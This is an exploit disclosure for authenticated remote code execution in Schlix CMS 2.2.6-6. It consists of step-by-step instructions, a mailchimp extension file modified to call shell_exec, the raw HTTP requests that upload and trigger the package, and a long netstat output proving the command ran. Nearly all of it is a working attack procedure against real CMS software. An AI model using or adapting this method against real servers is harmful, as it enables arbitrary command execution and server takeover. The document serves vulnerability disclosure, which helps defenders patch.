Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)

2021-05-06
ID: 104305
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 2021-05-06
# Exploit Author: Eren Saraç
# Vendor Homepage: https://www.schlix.com/
# Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip
# Version: 2.2.6-6
# Tested on: Windows & WampServer

==> Tutorial <==

1- Login with your account.
2- Go to the block management section. Directory is '/admin/app/core.blockmanager'.
3- Create a new category.
4- Download the 'mailchimp' extension from here. => https://github.com/calip/app_mailchimp
5- Open the 'packageinfo.inc' file. It is in '/blocks/mailchimp' directory.
6- Paste this PHP code below and save it.
#####################################
$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";

?>
#####################################

7- Compress the file to ZIP and rename it 'combo_mailchimp-1_0_1'.
8- Install a package to created category and enter the installed 'mailchimp' extension.
9- Click the 'About' tab and our php code will be executed.

==> Vulnerable 'packageinfo.inc' file. (mailchimp Extension) <==

<?php

$name = 'mailchimp';
$type = 'block';
$guid = '860e9d79-c5d0-37e4-894e-cdc19d06c7c3';
$version = '1.0';
$license = 'MIT';
$description = 'Mailchimp is the leading email marketing platform, that lets you send out fully customized email and newsletter campaigns to your subscribers. It is an imperative tool to build and follow through on your sales funnel, and helps you create and maintain lasting relations with your site visitors and customers.';
$author = 'Alip';
$url = 'https://github.com/calip/app_mailchimp';
$email = '[email protected]';
$copyright = 'Copyright &copy;2019 calip';
$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";

?>

==> HTTP Request (ZIP Extension Installation) <==

POST /admin/app/core.blockmanager?&ajax=1&action=install HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Schlix-Ajax: 1
Content-Type: multipart/form-data; boundary=---------------------------29322337091578227221515354130
Content-Length: 51585
Origin: http(s)://(ORIGIN)
Connection: close
Referer: http(s)://(REFERER)/admin/app/core.blockmanager
Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; 
schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2

-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="_csrftoken"

a3b9a0da8d6be08513f60d1744e2642df0702ff7
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="zipfileupload"; filename="combo_mailchimp-1_0_1.zip"
Content-Type: application/x-zip-compressed

#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################

-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="MAX_FILE_SIZE"

2097152
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="zipfileupload__total_file_size"

0
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="zipfileupload__max_file_count"

20
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="password"

# Your ACC Password.
-----------------------------29322337091578227221515354130--


==> HTTP Request (RCE - About Tab) <==

GET /admin/app/core.blockmanager?action=edititem&id=44 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http(s)://(HOST)/
Connection: close
Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; schlix_frontendedit_control_showblock=-2; 
schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2
Upgrade-Insecure-Requests: 1


==> HTTP Response (RCE - About Tab) <==

HTTP/1.1 200 OK
Date: Wed, 05 May 2021 21:49:24 GMT
Server: Apache/2.4.46 (Win64) PHP/7.3.21
X-Powered-By: PHP/7.3.21
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; expires=Wed, 05-May-2021 23:49:24 GMT; Max-Age=7200; path=/cms/; domain=127.0.0.1; HttpOnly; SameSite=lax
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49575

<!DOCTYPE html>
<html>
<body>
<div id="tab_options" class="schlixui-childtab">
<pre>
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:902            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:912            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3307           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:50296          0.0.0.0:0              LISTENING
  TCP    127.0.0.1:80           127.0.0.1:58843        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58853        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58854        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58859        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58860        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58865        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58868        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58883        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58893        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58894        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58899        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58902        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58908        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58918        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58919        TIME_WAIT
  TCP    127.0.0.1:80           127.0.0.1:58924        TIME_WAIT
  TCP    127.0.0.1:8080         127.0.0.1:58886        TIME_WAIT
  TCP    127.0.0.1:8080         127.0.0.1:58887        TIME_WAIT
  TCP    127.0.0.1:8080         127.0.0.1:58888        TIME_WAIT
  TCP    127.0.0.1:8080         127.0.0.1:58891        TIME_WAIT
  TCP    127.0.0.1:8080         127.0.0.1:58905        CLOSE_WAIT
  TCP    127.0.0.1:8080         127.0.0.1:58907        TIME_WAIT
  TCP    127.0.0.1:8080         127.0.0.1:58911        TIME_WAIT
  TCP    127.0.0.1:8080         127.0.0.1:58913        TIME_WAIT
  TCP    127.0.0.1:8080         127.0.0.1:58915        TIME_WAIT
  TCP    127.0.0.1:8080         127.0.0.1:58916        TIME_WAIT
  TCP    127.0.0.1:58424        127.0.0.1:58425        ESTABLISHED
  TCP    127.0.0.1:58425        127.0.0.1:58424        ESTABLISHED
  TCP    127.0.0.1:58435        127.0.0.1:58436        ESTABLISHED
  TCP    127.0.0.1:58436        127.0.0.1:58435        ESTABLISHED
  TCP    127.0.0.1:58565        127.0.0.1:58566        ESTABLISHED
  TCP    127.0.0.1:58566        127.0.0.1:58565        ESTABLISHED
  TCP    127.0.0.1:58639        127.0.0.1:58640        ESTABLISHED
  TCP    127.0.0.1:58640        127.0.0.1:58639        ESTABLISHED
  TCP    169.254.22.167:139     0.0.0.0:0              LISTENING
  TCP    169.254.224.26:139     0.0.0.0:0              LISTENING
  TCP    192.168.1.8:139        0.0.0.0:0              LISTENING
  TCP    192.168.1.8:49500      95.101.14.77:443       ESTABLISHED
  TCP    192.168.1.8:57059      162.159.129.235:443    ESTABLISHED
  TCP    192.168.1.8:57902      162.159.138.234:443    ESTABLISHED
  TCP    192.168.1.8:58453      44.235.189.138:443     ESTABLISHED
  TCP    192.168.1.8:58626      162.159.138.232:443    ESTABLISHED
  TCP    192.168.1.8:58627      162.159.133.234:443    ESTABLISHED
  TCP    192.168.1.8:58699      162.159.135.232:443    ESTABLISHED
  TCP    192.168.1.8:58841      20.44.232.74:443       ESTABLISHED
  TCP    192.168.1.8:58942      162.159.138.232:443    ESTABLISHED
  TCP    192.168.1.8:58951      138.68.92.190:443      ESTABLISHED
  TCP    192.168.1.8:60549      51.103.5.159:443       ESTABLISHED
  TCP    192.168.1.8:60610      104.66.70.197:443      ESTABLISHED
  TCP    192.168.1.8:60611      104.66.70.197:443      ESTABLISHED
  TCP    192.168.1.8:60612      217.31.233.104:443     CLOSE_WAIT
  TCP    [::]:80                [::]:0                 LISTENING
  TCP    [::]:135               [::]:0                 LISTENING
  TCP    [::]:445               [::]:0                 LISTENING
  TCP    [::]:3306              [::]:0                 LISTENING
  TCP    [::]:3307              [::]:0                 LISTENING
  TCP    [::]:7680              [::]:0                 LISTENING
  TCP    [::]:49664             [::]:0                 LISTENING
  TCP    [::]:49665             [::]:0                 LISTENING
  TCP    [::]:49666             [::]:0                 LISTENING
  TCP    [::]:49667             [::]:0                 LISTENING
  TCP    [::]:49668             [::]:0                 LISTENING
  TCP    [::]:50296             [::]:0                 LISTENING
  TCP    [::1]:3306             [::1]:58845            TIME_WAIT
  TCP    [::1]:3306             [::1]:58856            TIME_WAIT
  TCP    [::1]:3306             [::1]:58857            TIME_WAIT
  TCP    [::1]:3306             [::1]:58858            TIME_WAIT
  TCP    [::1]:3306             [::1]:58932            TIME_WAIT
  TCP    [::1]:3306             [::1]:58935            TIME_WAIT
  TCP    [::1]:3306             [::1]:58940            TIME_WAIT
  TCP    [::1]:3306             [::1]:58950            TIME_WAIT
  TCP    [::1]:3306             [::1]:58953            ESTABLISHED
  TCP    [::1]:3306             [::1]:58954            ESTABLISHED
  TCP    [::1]:49485            [::1]:49486            ESTABLISHED
  TCP    [::1]:49486            [::1]:49485            ESTABLISHED
  TCP    [::1]:49669            [::]:0                 LISTENING
  TCP    [::1]:58844            [::1]:3306             TIME_WAIT
  TCP    [::1]:58845            [::1]:3306             TIME_WAIT
  TCP    [::1]:58855            [::1]:3306             TIME_WAIT
  TCP    [::1]:58856            [::1]:3306             TIME_WAIT
  TCP    [::1]:58857            [::1]:3306             TIME_WAIT
  TCP    [::1]:58858            [::1]:3306             TIME_WAIT
  TCP    [::1]:58861            [::1]:3306             TIME_WAIT
  TCP    [::1]:58862            [::1]:3306             TIME_WAIT
  TCP    [::1]:58863            [::1]:3306             TIME_WAIT
  TCP    [::1]:58864            [::1]:3306             TIME_WAIT
  TCP    [::1]:58866            [::1]:3306             TIME_WAIT
  TCP    [::1]:58867            [::1]:3306             TIME_WAIT
  TCP    [::1]:58869            [::1]:3306             TIME_WAIT
  TCP    [::1]:58870            [::1]:3306             TIME_WAIT
  TCP    [::1]:58884            [::1]:3306             TIME_WAIT
  TCP    [::1]:58885            [::1]:3306             TIME_WAIT
  TCP    [::1]:58929            [::1]:3306             TIME_WAIT
  TCP    [::1]:58930            [::1]:3306             TIME_WAIT
  TCP    [::1]:58931            [::1]:3306             TIME_WAIT
  TCP    [::1]:58932            [::1]:3306             TIME_WAIT
  TCP    [::1]:58934            [::1]:3306             TIME_WAIT
  TCP    [::1]:58935            [::1]:3306             TIME_WAIT
  TCP    [::1]:58939            [::1]:3306             TIME_WAIT
  TCP    [::1]:58940            [::1]:3306             TIME_WAIT
  TCP    [::1]:58946            [::1]:3306             TIME_WAIT
  TCP    [::1]:58947            [::1]:3306             TIME_WAIT
  TCP    [::1]:58949            [::1]:3306             TIME_WAIT
  TCP    [::1]:58950            [::1]:3306             TIME_WAIT
  TCP    [::1]:58953            [::1]:3306             ESTABLISHED
  TCP    [::1]:58954            [::1]:3306             ESTABLISHED
  UDP    0.0.0.0:5050           *:*                    
  UDP    0.0.0.0:5353           *:*                    
  UDP    0.0.0.0:5355           *:*                    
  UDP    0.0.0.0:53240          *:*                    
  UDP    0.0.0.0:53241          *:*                    
  UDP    127.0.0.1:1900         *:*                    
  UDP    127.0.0.1:62353        *:*                    
  UDP    127.0.0.1:63129        *:*                    
  UDP    192.168.1.8:137        *:*                    
  UDP    192.168.1.8:138        *:*                    
  UDP    192.168.1.8:1900       *:*                    
  UDP    192.168.1.8:2177       *:*                    
  UDP    192.168.1.8:63128      *:*                    
  UDP    [::]:5353              *:*                    
  UDP    [::]:5355              *:*                    
  UDP    [::1]:1900             *:*                    
  UDP    [::1]:63125            *:*                                
  UDP    [fe80::e4d5:62f5:da3:2dae%21]:1900  *:*                    
  UDP    [fe80::e4d5:62f5:da3:2dae%21]:2177  *:*                    
  UDP    [fe80::e4d5:62f5:da3:2dae%21]:63124  *:*                    
</pre>
<div class="content">
    <div class="row">
        <div class="col-xs-12">
            <div class="text-center">
                <h1>mailchimp</h1>
                <p>v1.0</p><p>Author: <a href="mailto:[email protected]">Alip</a></p> 
                <p>Web: <a href="https://github.com/calip/app_mailchimp">https://github.com/calip/app_mailchimp</a></p> 
                <p><a href="/cms/admin/app/core.blockmanager?action=uninstall&name=mailchimp"><i class="fa fa-times-circle"></i>Uninstall</a></p>
            </div>
         </div>         
    </div>          
</div>
</div>
</body>
1-4-2 (www01)